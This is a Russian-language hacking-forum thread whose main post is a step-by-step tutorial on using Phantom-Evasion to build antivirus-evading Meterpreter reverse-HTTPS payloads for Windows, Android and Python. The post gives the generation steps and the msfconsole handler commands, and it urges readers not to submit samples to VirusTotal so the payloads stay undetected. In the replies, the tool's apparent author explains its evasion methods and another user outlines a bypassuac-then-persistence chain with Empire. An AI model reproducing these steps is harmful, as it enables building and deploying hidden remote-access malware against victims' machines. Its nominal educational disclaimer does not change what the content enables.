Статья Phantom-evasion FUD payloads

И снова Hello! Сегодня я хочу представить Вам удобный инструмент под названием Phantom-evasion.
Что он из себя представляет ?
Phantom-evasion - это удобный и простой в использовании инструмент для генерации полезной нагрузки, написан на Python, совместим с версиями python 2.7 and 3.4 и выше.

(Для генерации pyinstaller требуется python 2.7). Основной задачей данного инструмента является генерирование полезной нагрузки с обходом почти АВ почти 100% FUD на сегодняшний день.
Форматы выпуска payloads: exe/elf/apk/dmg
Платформы:
Windows,Linux,Android,Osx,Universal (Platform-Target)
Виды payloads:
  • windows/meterpreter/reverse_tcp for exe
  • linux/x86/meterpreter/reverse_tcp for elf
  • android/meterpreter/reverse_tcp for apk
  • osx/x64/meterpreter/reverse_tcp for dmg
  • python/meterpreter/reverse_tcp in Universal modules
Формат модулей рассмотрим далее. Перейдем к установке. Я буду использовать Kali Linux 2017.3 в виде атакующей машины, Windows Server 2012 R3 и Windows 10 (Build 16299) в виде атакуемой машины.

Вся информация предоставляется в ознакомительных целях. Данная статья описывает последовательность действий и инструменты, с помощью которых злоумышленник может проникнуть в Вашу систему и похитить ваши данные.

Установка :
Код:
git clone https://github.com/oddcod3/Phantom-Evasion.git
cd Phantom-Evasion
chmod +x phantom-evasion.py


Запуск:
Код:
./phantom-evasion.py

Проверка зависимостей
upload_2017-11-26_20-26-44.png


Если все окей, то видим следующую картину:

upload_2017-11-26_20-27-36.png


Посмотреть список всех модулей:

Код:
1 enter

upload_2017-11-26_20-29-27.png


Сегодня я продемонстрирую генерацию полезной нагрузки для Windows, Android. Вернемся в главное меню (0). Выберем список модулей Windows (2)

upload_2017-11-26_20-30-44.png


Пробуем вариант под номер 1

upload_2017-11-26_20-31-40.png


Выберем способ генерации шелкода. Я выбираю с помощью всеми известного msfvenom.

Код:
1 enter
Далее нас просят выбрать тип payload. Я выберу следующий:
Код:
windows/meterpreter/reverse_https
Далее нужно прописать LHOST ( на какой айпишник стучаться)
Код:
ip
Далее нужно прописать LPORT(на какой порт стучаться)
Код:
2222
После выбрать имя файла
ForCodeby
После чего пойдет генерации и компиляция нашего payload. Если все успешно, то в нашей папке будет хранится файл ForCodeby.exe


upload_2017-11-26_20-38-3.png


Проверим работоспособность нашего payload, так же посмотрим результаты на nodistribute.com
Запустим хандлер и будет слушать Ip и порт, который мы указали при генерации payload:

Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.102
set LPORT 2222
exploit -j

После запуска на целевом компьютере в процессах появится процесс : ForCodeby.exe

upload_2017-11-26_20-45-37.png


Проверим файл на nodistribute.com



И видим полный FUD!!

upload_2017-11-26_20-49-22.png


Уважительная просьба не лить на VIRUS TOTAL. Дайте полезной нагрузке подышать свежим воздухом< ВЗДОХНУТЬ ГЛОТОК СВОБОДЫ!) Проверяйте хотя бы на сайте, на котором проверил я. От этого будет лучше всем, кроме АВ компаний. Спасибо!

Что ж, хороший старт, давайте создадим еще один с помощью другого способа, тоже для Windows. С использованием абсолютно тех же параметров, которые я указал выше. Я не буду скринить процесс, он ничем не будет отличаться от выше стоящего, за исключением выбора модуля.

Я выбираю:

Код:
[2] Windows MultipathHeapAlloc  (C)

upload_2017-11-26_20-55-3.png


Все, файл создан. Проверим работоспособность. Отправим на атакуемую машину и запустим.

upload_2017-11-26_20-58-22.png



Как видим снова Prof1t! ^_^
Процесс запущен, сессия прилетела. Доступ к командной строке получен =)


Результаты обнаружения тоже радуют глаз.

upload_2017-11-26_21-2-9.png


Что ж, я думаю с виндовс достаточно двух примеров. Сразу хочу сказать что 3-й способ я тоже пробовал
Какой - то Богом забытый что-то нашел, но это не страшно)

Результат :

Также, по просьбе ghostphisher в теме https://codeby.net/threads/uvazhaemye-avtory-tem.61280/ я проверю работоспособность PAYLOAD на Windows 10

ggbMEs7dOyg.jpg


Как видим, профит!

Теперь попробуй сгенерить файлик для анроид. Самому интересно че и как будет :)

В главном меню выберем:
Код:
[5]  List Android modules
Далее выбор не большой)
Код:
[1] Android Droidmare msfvenom-rebuilder (Smali)[/B][/B][/B][/B][/B]
[B][B][B][B][B][1] Obfuscate msf payload

После чего формальности заполнения LHOST and LPORT и выбор payload
Код:
android/meterpreter/reverse_https

PVIon_Ca_bQ.jpg


Собственно видим успешную генерацию PAYLOAD!) Но рано радоваться, надо проверить его работу и обнаружение! Убедительная просьба для тех, у кого есть анроид, проверить АВАСПОМ и dr Web. Почему сам не могу? У меня кирпич под названием "недостаточно памяти" galaxy ace S5830 который вздрагивает каждый раз, когда я беру его в руки. Поэтому я покажу результат обнаружения на нодистр, а внутренним антивирусом телефона не буду прогонять. Так же сейчас нахожусь не дома, поэтому нет виртуального ведроида) Просто запущу пайлоад, чтобы проверить его работу!

Сессия у меня не прилетает, не знаю с чем это связано. Может ведроид мой совсем плох, с помощью Evil-Droid сгенерированный файл отлично отрабатывает. Здесь процесс появился, но никто на порт не стучится. Если кто будет пробовать, отпишитесь о результатах у себя.


Обнаружение:

upload_2017-11-26_21-38-10.png



Теперь попробуем сгенерировать питоновский файл to exe)
Для этого в главном меню выберем 6


upload_2017-11-26_22-4-17.png




upload_2017-11-26_22-7-11.png


Код:
[2] Universal Polymorphic Pyhterpreter (Python)[/COLOR][/B][/COLOR][/B][/COLOR][/B][/COLOR][/B]
[B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000][B][COLOR=#ff8000]python/meterpreter/reverse_https

Далее LHOST and LPORT и после предложить сгенерить .ехе, жмем y. Все на выходе появился наш файл.


Проверим его работу на вин 10 с питоном 2.7

upload_2017-11-26_22-11-5.png


После запуска на стороне вин 10 пришла сессия.
Результат скана :

upload_2017-11-26_22-12-46.png



Если подвести итоги, то в целом я получил хорошие впечатления) Вышел он недавно, надеюсь поживет еще. Хотя в версии 0.2 они обещали все обновить еще раз! Надеюсь статья получилось годной, спасибо за внимание, всем Prof1t! =)
 

Вложения

  • upload_2017-11-26_20-36-9.png
    upload_2017-11-26_20-36-9.png
    10,6 КБ · Просмотры: 278
  • upload_2017-11-26_20-58-4.png
    upload_2017-11-26_20-58-4.png
    128,1 КБ · Просмотры: 292
  • upload_2017-11-26_21-30-17.png
    upload_2017-11-26_21-30-17.png
    24,4 КБ · Просмотры: 339
  • upload_2017-11-26_21-30-42.png
    upload_2017-11-26_21-30-42.png
    25,3 КБ · Просмотры: 285
  • upload_2017-11-26_22-10-9.png
    upload_2017-11-26_22-10-9.png
    4,6 КБ · Просмотры: 314
Последнее редактирование модератором:

ghost

Well-known member
12.05.2016
1 636
3 289
BIT
0
Hi everybody i'm oddcod3, the author of Phantom Evasion, i'm really glad to see you've apprecieted the tool!!
Feel free to send me email regarding problems or information of the tool!
It's born only few weeks ago and i will keep updating and upgrading it untill my brain find ways to fool antiviruses!
Actually all the modules uses resource consumption technique to fool all the best dynamic analysis engine of antiviruses (AVG,AVAST,AVIRA) but use simple shikata_ga_nai encoding to evade static analysis.
The versione 0.2 is coming with much more polymorphism and with a custom Multibyte key XOR algorithm with c decryption stub making static analysis evasion a lot stronger!

Kind regards

Diego Cornacchini (oddcod3)

Italy
Разработчики подкатили :) Thank you
 
  • Нравится
Реакции: Vertigo и Oddcod3

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
Закрепление в системе делаю через империю:

upload_2017-11-27_15-49-11-png.13288

set Agent autorun <--- Автор не про бывал? Это при большом количестве клиентов))) что бы например сидеть пить кофе и одновременно ловить и удерживать всех "желающих" за ХВОСТ!))))) или за "хоботок" кому как!?)) или же: ладно дерзану! Как говорит моя знакомая подруга "за кутасики")))

ГЫ) я про то что это функция своего рода avto-persistence

Автор, молодца!
 
Последнее редактирование:
O

OneDollar

set Agent autorun <--- Автор не про бывал? Это при большом количестве клиентов))) что бы например сидеть пить кофе и одновременно ловить и удерживать всех "желающих" за ХВОСТ!)))))
Как-то сильно просто ахах) Спасибо! Можешь подсказать еще один момент по империи? Если моя империя не запущена в момент включения компа вистим, то после загрузки винды я ее не могу словить, хотя 2 процесса повершел запущены. Но, если моя империя включена, то без проблем, все как по маслу) Какой параметр нужно изменить ? С этим не только я столкнулся..
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
ну по думай логически! если ты настроил авторан, так? выставил время 60сек на обратный отстук!)) как думаешь каков будет результат?))
 
  • Нравится
Реакции: Tihon49 и OneDollar

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
Бро, я не говорю именно про этот модуль перса! Я про то что есть и другие модули : usemodule powershell/persistence +TAB ))
нажми! и ты узреешь.. НО есть одно но, не каждый срабатывает от простого юзера! Знаааааачит:

1)рассчитываем время
2)берем модуль bypassuac
3)делаем что бы он запускался первым! <set Agent autorun>
4)затем персист.!))

вот тогда по лучится "за кутасики")))) только не спешите.. не все офисные компы быстры))

и внимательно читаем официальную от производителя софта я про Империю
 
Последнее редактирование:

e.exploit

Green Team
11.09.2016
21
9
BIT
24
Именно так- иногда АВ и разные защитники срабатывают в момент определенных активных действий. Например: когда я тестил повершеловский реверс из hta на винде10(без отдельного АВ), то сессия установилась и можно было лезть куда угодно, но как только я попытался удалить текстовый файл, то получил бан и тревогу от штатного защитника винды. Вот так.
 
T

TST

Hi everybody i'm oddcod3, the author of Phantom Evasion, i'm really glad to see you've apprecieted the tool!!
Feel free to send me email regarding problems or information of the tool!
It's born only few weeks ago and i will keep updating and upgrading it untill my brain find ways to fool antiviruses!
Actually all the modules uses resource consumption technique to fool all the best dynamic analysis engine of antiviruses (AVG,AVAST,AVIRA) but use simple shikata_ga_nai encoding to evade static analysis.
The versione 0.2 is coming with much more polymorphism and with a custom Multibyte key XOR algorithm with c decryption stub making static analysis evasion a lot stronger!

Kind regards

Diego Cornacchini (oddcod3)

Italy
Hi, Diego. I faced the problem that i can't generate shell code, it gives the error. Can y help me with it?
Screenshot from 2017-11-28 15-56-06.png

[doublepost=1511925620,1511925308][/doublepost]
Опишите последовательность действий создания, которую вы проделали
Сделал все так как написано здесь:https://codeby.net/threads/phantom-evasion-fud-payloads.61284/
Но при генерации выдает ошибку и не получается получить в конце шелл код
Проблема не может быть в зависимоятих когда в начале загружаешь phantom-evasion-fud?
 
  • Нравится
Реакции: Oddcod3

adm2

Green Team
05.07.2017
50
120
BIT
0
Hi, Diego. I faced the problem that i can't generate shell code, it gives the error. Can y help me with it?Посмотреть вложение 13390
[doublepost=1511925620,1511925308][/doublepost]
Сделал все так как написано здесь:https://codeby.net/threads/phantom-evasion-fud-payloads.61284/
Но при генерации выдает ошибку и не получается получить в конце шелл код
Проблема не может быть в зависимоятих когда в начале загружаешь phantom-evasion-fud?
Привет, под последовательностью имеется ввиду с самого начала)
Какой пункт меню выбрал, какие параметры затем в дальнейшем указал, дабы можно было воспроизвести у себя и посмотреть на проблему)
вангую, что выбраны некорректные параметры пейлоада, но нужна последовательность)
но и зависимости все должны стоять как на скрине в начале поста:
upload_2017-11-26_20-26-44.png
 
T

TST

Привет, под последовательностью имеется ввиду с самого начала)
Какой пункт меню выбрал, какие параметры затем в дальнейшем указал, дабы можно было воспроизвести у себя и посмотреть на проблему)
вангую, что выбраны некорректные параметры пейлоада, но нужна последовательность)
но и зависимости все должны стоять как на скрине в начале поста:
Посмотреть вложение 13391
Вроде ошибка из за зависимостей но при генерации шелл кода об этом не указывается
Screenshot from 2017-11-29 10-40-50.png
Screenshot from 2017-11-29 10-40-52.png
Screenshot from 2017-11-29 10-41-49.png
 

adm2

Green Team
05.07.2017
50
120
BIT
0
Вроде ошибка из за зависимостей но при генерации шелл кода об этом не указывается
Посмотреть вложение 13397 Посмотреть вложение 13398 Посмотреть вложение 13399
Для начала устраним ошибки в зависимостях
Код:
apt-get install mingw-w64 zipalign

Далее: нажатие Enter при выборе пейлоада не загружает его из примера) необходимо явное его указание)
т.е. копируешь строку windows/meterpreter/reverse_tcp и вставляешь в это поле) оно у тебя пустое)

Screenshot from 2017-11-29 10-41-49.png

[doublepost=1511931723,1511931230][/doublepost]
bandicam-2017-11-29-09-59-23-723.gif
[doublepost=1511932920][/doublepost]Да и перед установкой пакетов лучше сделать
Код:
apt update
[doublepost=1511932963][/doublepost]Ибо скрипт пытается их поставить, но в репозиториях не обнаруживает)
[doublepost=1511933054][/doublepost]Если так то выполни команду
Код:
if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi
Если выскочат "Проблемы с репозиториями", запускай
Код:
echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list
[doublepost=1511933244][/doublepost]Если думаешь, что запорол систему прям вообще в край) то проще скачай новый образ для виртуалки) там уже всё настроено: от репозиториев, до гостевых служб
 
T

TST

Для начала устраним ошибки в зависимостях
Код:
apt-get install mingw-w64 zipalign

Далее: нажатие Enter при выборе пейлоада не загружает его из примера) необходимо явное его указание)
т.е. копируешь строку windows/meterpreter/reverse_tcp и вставляешь в это поле) оно у тебя пустое)

Посмотреть вложение 13400
[doublepost=1511931723,1511931230][/doublepost] [doublepost=1511932920][/doublepost]Да и перед установкой пакетов лучше сделать
Код:
apt update
[doublepost=1511932963][/doublepost]Ибо скрипт пытается их поставить, но в репозиториях не обнаруживает)
[doublepost=1511933054][/doublepost]Если так то выполни команду
Код:
if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi
Если выскочат "Проблемы с репозиториями", запускай
Код:
echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list
[doublepost=1511933244][/doublepost]Если думаешь, что запорол систему прям вообще в край) то проще скачай новый образ для виртуалки) там уже всё настроено: от репозиториев, до гостевых служб
вбиваю команду :apt-get install mingw-w64 zipalignReading package lists... Done
Выдает ошибку :
Building dependency tree
Reading state information... Done
E: Unable to locate package mingw-w64
E: Unable to locate package zipalign

сделал так как сказано выше и траблы к репозиторией
обновил но все равно ошибка:
E: Unable to locate package mingw-w64
E: Unable to locate package zipalign
[doublepost=1511934268][/doublepost]
Для начала устраним ошибки в зависимостях
Код:
apt-get install mingw-w64 zipalign

Далее: нажатие Enter при выборе пейлоада не загружает его из примера) необходимо явное его указание)
т.е. копируешь строку windows/meterpreter/reverse_tcp и вставляешь в это поле) оно у тебя пустое)

Посмотреть вложение 13400
[doublepost=1511931723,1511931230][/doublepost] [doublepost=1511932920][/doublepost]Да и перед установкой пакетов лучше сделать
Код:
apt update
[doublepost=1511932963][/doublepost]Ибо скрипт пытается их поставить, но в репозиториях не обнаруживает)
[doublepost=1511933054][/doublepost]Если так то выполни команду
Код:
if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi
Если выскочат "Проблемы с репозиториями", запускай
Код:
echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list
[doublepost=1511933244][/doublepost]Если думаешь, что запорол систему прям вообще в край) то проще скачай новый образ для виртуалки) там уже всё настроено: от репозиториев, до гостевых служб

наверно в репозитории адреса не работают

Screenshot from 2017-11-29 11-43-25.png
 
O

Oddcod3

Hi, Diego. I faced the problem that i can't generate shell code, it gives the error. Can y help me with it?Посмотреть вложение 13390
[doublepost=1511925620,1511925308][/doublepost]
Сделал все так как написано здесь:https://codeby.net/threads/phantom-evasion-fud-payloads.61284/
Но при генерации выдает ошибку и не получается получить в конце шелл код
Проблема не может быть в зависимоятих когда в начале загружаешь phantom-evasion-fud?

Hi TST i see that you've pressed enter on the payload choice phase!
There's no default payload choice with enter and no error checking routine on user input so phantom-evasion exited badly because "Invalid payload selected".
Another tips when you choose output filename remeber that the file will be always saved into the Phantom Evasion directory.
Dependecies problem maybe is a little more complex

Try running:

Dpkg -l | grep "mingw-w64"

Does it output something?
 
T

TST

Hi TST i see that you've pressed enter on the payload choice phase!
There's no default payload choice with enter and no error checking routine on user input so phantom-evasion exited badly because "Invalid payload selected".
Another tips when you choose output filename remeber that the file will be always saved into the Phantom Evasion directory.
Dependecies problem maybe is a little more complex

Try running:

Dpkg -l | grep "mingw-w64"

Does it output something?
nothing happened.
i tried everything but the trouble in generating the shellcode
Screenshot from 2017-11-29 17-55-53.png
Screenshot from 2017-11-29 17-55-53.png
Screenshot from 2017-11-29 17-55-57.png

[doublepost=1511956871,1511956634][/doublepost]
Hi TST i see that you've pressed enter on the payload choice phase!
There's no default payload choice with enter and no error checking routine on user input so phantom-evasion exited badly because "Invalid payload selected".
Another tips when you choose output filename remeber that the file will be always saved into the Phantom Evasion directory.
Dependecies problem maybe is a little more complex

Try running:

Dpkg -l | grep "mingw-w64"

Does it output something?
trouble with dependensies
Screenshot from 2017-11-29 17-53-24.png
 
  • Нравится
Реакции: Oddcod3

Urfin--Juice

Green Team
14.11.2017
203
74
BIT
3
Oddcod3, thanks a lot for this tool!!! Great job!

Now the "custom shellcode" option is available, but it doesn't accept the root to the payload as input.
I've also tried to insert the stager from Empire in string format... Phantom did his job, I got the payload, but unfortunately it didn't work on the target host...

So I just wonder if it will be possible someday to use a custom stager as a payload?
 
  • Нравится
Реакции: Oddcod3
O

Oddcod3

nothing happened.
i tried everything but the trouble in generating the shellcode
Посмотреть вложение 13416 Посмотреть вложение 13416 Посмотреть вложение 13417
[doublepost=1511956871,1511956634][/doublepost]
trouble with dependensies Посмотреть вложение 13418
OK now shellcode is generated correctly and you've reached the compilation phase but it doesn't work because it's missing mingw-w64 to cross compile for windows and create exe file.
Have you tried to upgrade kali with "apt-get update && apt-get upgrade -y && dist-upgrade -y" and then manually install with "apt-get install mingw-w64" ?
If it don't work it seems that you're having troubles with your kali installation
In that case try :
"apt-get install --fix-missing"
And look if you have any pending or broken package:
"dpkg --configure -a"
[doublepost=1511961810][/doublepost]
Oddcod3, thanks a lot for this tool!!! Great job!

Now the "custom shellcode" option is available, but it doesn't accept the root to the payload as input.
I've also tried to insert the stager from Empire in string format... Phantom did his job, I got the payload, but unfortunately it didn't work on the target host...

So I just wonder if it will be possible someday to use a custom stager as a payload?

Yes actually custom shellcode option require the hexadecimal escaped format as input
Example: \xde\xad\xbe\xef
Usefull to combine veil-ordnance payload
Like showed by Pasahitz (i guess he's the author of zirikatu) in this video:


Maybe in the future i will add the "pass the payloas as binary file (Raw format)" options!!
 
T

TST

Hi TST i see that you've pressed enter on the payload choice phase!
There's no default payload choice with enter and no error checking routine on user input so phantom-evasion exited badly because "Invalid payload selected".
Another tips when you choose output filename remeber that the file will be always saved into the Phantom Evasion directory.
Dependecies problem maybe is a little more complex

Try running:

Dpkg -l | grep "mingw-w64"

Does it output something?
Can You give me the right repositories for source.list!
I used deb kali-rolling main non-free contrib , but it doesn't update.
 

crestfo

Green Team
21.06.2017
15
2
BIT
0
Ребят подскажите, можно ли к готовому файлу добавить иконку например? Делаю уже на windowse через resource hacker - потом файл перестаёт работать.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!